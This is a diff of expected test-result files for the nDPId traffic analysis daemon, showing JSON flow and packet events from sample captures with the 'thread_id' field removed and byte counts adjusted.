01451{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}} 01451{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}}
00372{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976094725,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976094725,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"}
00205{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976094729} 00191{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976094729}
01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100559,"flow_last_seen":1490976100559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100559,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100559,"flow_last_seen":1490976100559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100559,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1490976100559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100559,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgZAAEAGAiWsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pqQAAAgQFtAQCCAoA9mWXAAAAAAEDAwg="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1490976100559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100559,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgZAAEAGAiWsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pqQAAAgQFtAQCCAoA9mWXAAAAAAEDAwg="}
@@ -1083,6 +1083,6 @@
~~ total memory freed........: 5413232 bytes ~~ total memory freed........: 5413232 bytes
~~ total allocations/frees...: 105819/105819 ~~ total allocations/frees...: 105819/105819
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 203 chars ~~ json string min len.......: 189 chars
~~ json string max len.......: 2122 chars ~~ json string max len.......: 2122 chars
~~ json string avg len.......: 1162 chars ~~ json string avg len.......: 1155 chars

1758
test/results/anydesk-2.pcap.out
View File

File diff suppressed because one or more lines are too long

406
test/results/badpackets.pcap.out
View File

@@ -1,206 +1,206 @@
00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"badpackets.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"badpackets.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00468{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"badpackets.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1495451029466} 00468{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"badpackets.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1495451029466}
00641{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":271,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcP1QgAOcRe9CDTlH+zLpQ5QA1zGcGtUqtAWiFkwABAAAADAABC3BobDFzcHJ0MTA4AmFkA2RsYQNtaWwAAAEAAcAbAAYAAQAAAh0ALQhlYWdsZWliMcAYC3JhbmR5LnNtaXRowBt3sikrAAAqMAAABDgACTqAAAADhMAbAC4AAQAAAh0AmwAGCAIAAAOEWS\/o5lkiq9Y2JANkbGEDbWlsAEPjY6zabVfm9vwk6mSh9m4kj9u7ZDlkxqtiglIZTh\/RONTC0jpNpQmC+rJg1+X5ptcybqG6dncq1KPvSJq3fG1w8VDIG7zJf7f6G9gikY9VMCGmBxLlsKtyxHORaw=="} 00627{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":271,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcP1QgAOcRe9CDTlH+zLpQ5QA1zGcGtUqtAWiFkwABAAAADAABC3BobDFzcHJ0MTA4AmFkA2RsYQNtaWwAAAEAAcAbAAYAAQAAAh0ALQhlYWdsZWliMcAYC3JhbmR5LnNtaXRowBt3sikrAAAqMAAABDgACTqAAAADhMAbAC4AAQAAAh0AmwAGCAIAAAOEWS\/o5lkiq9Y2JANkbGEDbWlsAEPjY6zabVfm9vwk6mSh9m4kj9u7ZDlkxqtiglIZTh\/RONTC0jpNpQmC+rJg1+X5ptcybqG6dncq1KPvSJq3fG1w8VDIG7zJf7f6G9gikY9VMCGmBxLlsKtyxHORaw=="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":1,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":237,"global_ts_msec":1495451029466} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":237,"global_ts_msec":1495451029466}
00685{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":305,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc9nogAOcRxKmDTlH+zLpQ5QA1PsIG13F6XwyFkwABAAAADAABC3BobDFzcHJ0MTA4BGRhYXMDZGxhA21pbAAAAQABwBgABgABAAAAbgAwCGVhZ2xlaWIxAmFkwB0LcmFuZHkuc21pdGjAHQExm5UAAAC0AAAAEgAJOoAAAAOEwBgALgABAAAAbgCgAAYIAwAAALRZLyttWSHuXTGGBGRhYXMDZGxhA21pbABfZgMcUaz74\/opjmPI6fIN7S4Ga9GN4s2JVqvb0uXXvbdLi9ee5JaFRYVlFB0RVerGRt3pX5esuSlY9ySHVHjOBX09ZI1nwdlSMxmFBY9ZemmmfYIR43tvzwqFnbufNVeL7\/vc0q83XBfNipWbDRE5bz+qVR8="} 00671{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":305,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc9nogAOcRxKmDTlH+zLpQ5QA1PsIG13F6XwyFkwABAAAADAABC3BobDFzcHJ0MTA4BGRhYXMDZGxhA21pbAAAAQABwBgABgABAAAAbgAwCGVhZ2xlaWIxAmFkwB0LcmFuZHkuc21pdGjAHQExm5UAAAC0AAAAEgAJOoAAAAOEwBgALgABAAAAbgCgAAYIAwAAALRZLyttWSHuXTGGBGRhYXMDZGxhA21pbABfZgMcUaz74\/opjmPI6fIN7S4Ga9GN4s2JVqvb0uXXvbdLi9ee5JaFRYVlFB0RVerGRt3pX5esuSlY9ySHVHjOBX09ZI1nwdlSMxmFBY9ZemmmfYIR43tvzwqFnbufNVeL7\/vc0q83XBfNipWbDRE5bz+qVR8="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":2,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":271,"global_ts_msec":1495451030401} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":271,"global_ts_msec":1495451030401}
00542{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":195,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc+0kgAD4R+SzH+X0BzLpQ5QA17UEGadbGg\/+EAAABAAcAAAABAmFjAmluAAAwAAHADAAwAAEAAAOEAIgBAAMHAwEAAaeWg1I7aL35m5DCbWdqIX1+dVtvwe4HaQJz7QrnwC+P8\/7Gi54fYbmoWgZ9BgFy+rRM5fLeLdyqgaAlGaU+qP7EB\/v\/pv\/GHQKcotJZ+biekG9TccSc6BYmV0hXKBRudE\/xZj\/qEl0HEAn3LKZa"} 00528{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":195,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc+0kgAD4R+SzH+X0BzLpQ5QA17UEGadbGg\/+EAAABAAcAAAABAmFjAmluAAAwAAHADAAwAAEAAAOEAIgBAAMHAwEAAaeWg1I7aL35m5DCbWdqIX1+dVtvwe4HaQJz7QrnwC+P8\/7Gi54fYbmoWgZ9BgFy+rRM5fLeLdyqgaAlGaU+qP7EB\/v\/pv\/GHQKcotJZ+biekG9TccSc6BYmV0hXKBRudE\/xZj\/qEl0HEAn3LKZa"}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":3,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":161,"global_ts_msec":1495451039146} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":161,"global_ts_msec":1495451039146}
00338{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":4,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcmCogADkR555F\/HiszLpQ5QA15twF1D2Yf1WEAA=="} 00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcmCogADkR555F\/HiszLpQ5QA15twF1D2Yf1WEAA=="}
00245{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":4,"source":"badpackets.pcap","alias":"nDPId-test","size":46,"expected":60,"global_ts_msec":1495451051753} 00231{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":4,"source":"badpackets.pcap","alias":"nDPId-test","size":46,"expected":60,"global_ts_msec":1495451051753}
00338{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":4,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcmCogADkR555F\/HiszLpQ5QA15twF1D2Yf1WEAA=="} 00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcmCogADkR555F\/HiszLpQ5QA15twF1D2Yf1WEAA=="}
00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":4,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":12,"global_ts_msec":1495451051753} 00204{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":12,"global_ts_msec":1495451051753}
00647{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":276,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc\/u8gAOcRvDSDTlH+zLpQ5QA1ofQGuiMOhg6FkwABAAAADAABDG5jYjFzZHYwMDcyMQNkaXICYWQDZGxhA21pbAAAAQABwCAABgABAAAAmQAtCGVhZ2xlaWIxwB0LcmFuZHkuc21pdGjAIHeyKSsAACowAAAEOAAJOoAAAAOEwCAALgABAAAAmQCbAAYIAgAAA4RZL+jmWSKr1jYkA2RsYQNtaWwAQ+NjrNptV+b2\/CTqZKH2biSP27tkOWTGq2KCUhlOH9E41MLSOk2lCYL6smDX5fmm1zJuobp2dyrUo+9Imrd8bXDxUMgbvMl\/t\/ob2CKRj1UwIaYHEuWwq3LEc5Fr"} 00633{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":276,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc\/u8gAOcRvDSDTlH+zLpQ5QA1ofQGuiMOhg6FkwABAAAADAABDG5jYjFzZHYwMDcyMQNkaXICYWQDZGxhA21pbAAAAQABwCAABgABAAAAmQAtCGVhZ2xlaWIxwB0LcmFuZHkuc21pdGjAIHeyKSsAACowAAAEOAAJOoAAAAOEwCAALgABAAAAmQCbAAYIAgAAA4RZL+jmWSKr1jYkA2RsYQNtaWwAQ+NjrNptV+b2\/CTqZKH2biSP27tkOWTGq2KCUhlOH9E41MLSOk2lCYL6smDX5fmm1zJuobp2dyrUo+9Imrd8bXDxUMgbvMl\/t\/ob2CKRj1UwIaYHEuWwq3LEc5Fr"}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":5,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":242,"global_ts_msec":1495451098935} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":242,"global_ts_msec":1495451098935}
00516{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW1QgADURSISMrBHtzLpQ5QA1RHoMIdhWPYOEEAABAA0ABAANCGVkZ2UtaGRxA3dvYwRub2FhA2dvdgAAAQABwAwABQABAAABLAAMB2VkZ2UtcDEBbMAZwAwALgABAAABLAEgAAUFBAAAASxZK4vIWSJRSL+OA3dvYwRub2FhA2dvdgAf19hoQ062mEgmdReiMHoN\/8sTkGCL+YszFpFSC7g="} 00502{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW1QgADURSISMrBHtzLpQ5QA1RHoMIdhWPYOEEAABAA0ABAANCGVkZ2UtaGRxA3dvYwRub2FhA2dvdgAAAQABwAwABQABAAABLAAMB2VkZ2UtcDEBbMAZwAwALgABAAABLAEgAAUFBAAAASxZK4vIWSJRSL+OA3dvYwRub2FhA2dvdgAf19hoQ062mEgmdReiMHoN\/8sTkGCL+YszFpFSC7g="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":6,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":145,"global_ts_msec":1495451112063} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":145,"global_ts_msec":1495451112063}
00953{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":7,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":503,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":503,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAAgADIR1DehNyACzLpQ5QA1P3oNZUi5Fp+EEAABAA8ABAANA3d3dwRzd3BjBG5vYWEDZ292AAABAAHADAAFAAEAAVGAAA8IZWRnZS1ud3MDd29jwBXADAAuAAEAAVGAASEABQUEAAFRgFkri7dZIlE3vjIEc3dwYwRub2FhA2dvdgAj4QRDWjZKG5AY0wcqp07zy2N5LWrEg0t\/4W81\/I\/yU9kryWY5M6hQke0XIJhE4dUH120W7nAkWxQJVaZyLoMQin38ZiK2SNs\/MeioL4jAC1CzjiZ9JGBmrvUXfwx4WjCIZO3AWpZFqZpBYNrilA5xXqA6vClBMfN6kWmnwyqYMUdmG8SPzKDGLoKCurB88lxuBmDxFiEc7IRKwyXcJ47WkYAmncTdtBPbcng8wUk\/OSHputwVXEiz+4Hi1YSwyaZ\/bR92tO2XAf2y65TJB549EX80zlNliCWrbo6CKiF1dSuOYR0v1cuBHf05mH4wAy8XKl6vLSm5lJ0SyJmHuu8SwC8ABQABAAABLAAMB2VkZ2UtcDEBbMBhwC8ALgABAAABLAEgAAUFBAAAASxZK4vIWSJRSL+OA3dvYwRub2FhA2dvdgCQTrqAqFPUlwzaSBYq8hc48+OOYcX3TV6bWxXaYm8="} 00939{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":503,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":503,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAAgADIR1DehNyACzLpQ5QA1P3oNZUi5Fp+EEAABAA8ABAANA3d3dwRzd3BjBG5vYWEDZ292AAABAAHADAAFAAEAAVGAAA8IZWRnZS1ud3MDd29jwBXADAAuAAEAAVGAASEABQUEAAFRgFkri7dZIlE3vjIEc3dwYwRub2FhA2dvdgAj4QRDWjZKG5AY0wcqp07zy2N5LWrEg0t\/4W81\/I\/yU9kryWY5M6hQke0XIJhE4dUH120W7nAkWxQJVaZyLoMQin38ZiK2SNs\/MeioL4jAC1CzjiZ9JGBmrvUXfwx4WjCIZO3AWpZFqZpBYNrilA5xXqA6vClBMfN6kWmnwyqYMUdmG8SPzKDGLoKCurB88lxuBmDxFiEc7IRKwyXcJ47WkYAmncTdtBPbcng8wUk\/OSHputwVXEiz+4Hi1YSwyaZ\/bR92tO2XAf2y65TJB549EX80zlNliCWrbo6CKiF1dSuOYR0v1cuBHf05mH4wAy8XKl6vLSm5lJ0SyJmHuu8SwC8ABQABAAABLAAMB2VkZ2UtcDEBbMBhwC8ALgABAAABLAEgAAUFBAAAASxZK4vIWSJRSL+OA3dvYwRub2FhA2dvdgCQTrqAqFPUlwzaSBYq8hc48+OOYcX3TV6bWxXaYm8="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":7,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":469,"global_ts_msec":1495451113347} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":469,"global_ts_msec":1495451113347}
